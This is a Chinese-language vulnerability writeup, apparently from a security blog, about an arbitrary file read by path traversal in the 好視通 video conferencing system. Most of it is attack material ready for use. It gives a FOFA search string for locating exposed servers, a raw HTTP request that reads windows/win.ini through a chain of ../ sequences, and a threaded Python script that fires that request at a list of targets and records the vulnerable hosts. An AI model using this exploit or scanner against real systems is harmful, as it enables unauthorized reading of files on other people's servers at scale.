漏洞簡介

好視通視頻會議是由深圳市華視瑞通信息技術有限公司開發，其在國內率先推出了3G互聯網視頻會議，并成功應用于SAAS領域。

資產

FOFA:app="好視通-視頻會議"

POC

GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length:?0

漏洞復現

使用Burp或Yakit進行發包測試

批量測試

pip install requests

然后運行腳本進行測試

import requestsimport concurrent.futures
def check_vulnerability(target):    headers = {           "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",        "Content-Length":"0"       }
    try:        # print(target)        res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False)        if "extensions"in res.text and "CMCDLLNAME32" in res.text:            print(f"[+]{target}漏洞存在")            with open("attack.txt",'a') as fw:                fw.write(f"{target}\n")        else:            print(f"[-]{target}漏洞不存在")    except Exception as e:        print(f"[-]{target}訪問錯誤")
if __name__ == "__main__":    print("------------------------")    print("微信公眾號:知攻善防實驗室")    print("------------------------")    print("target.txt存放目標文件")    print("attack.txt存放檢測結果")    print("------------------------")    print("按回車繼續")    import os    os.system("pause")    f = open("target.txt", 'r')    targets = f.read().splitlines()    print(targets)
    # 使用線程池并發執行檢查漏洞    with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:        executor.map(check_vulnerability, targets)